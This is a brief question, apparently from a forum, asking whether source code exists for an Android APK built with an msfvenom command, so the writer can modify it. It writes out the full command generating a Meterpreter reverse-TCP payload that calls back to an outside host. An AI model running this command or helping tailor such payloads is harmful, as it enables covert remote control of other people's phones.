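Using: msfvenom -p android/meterpreter/reverse_tcp lhost=114.114.114.114 lport=3306 -o ~/Downloads/msf.apk to generate an APK, I would like to know whether there is source code corresponding to this APK; I would like to try making some modifications on top of that source code.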
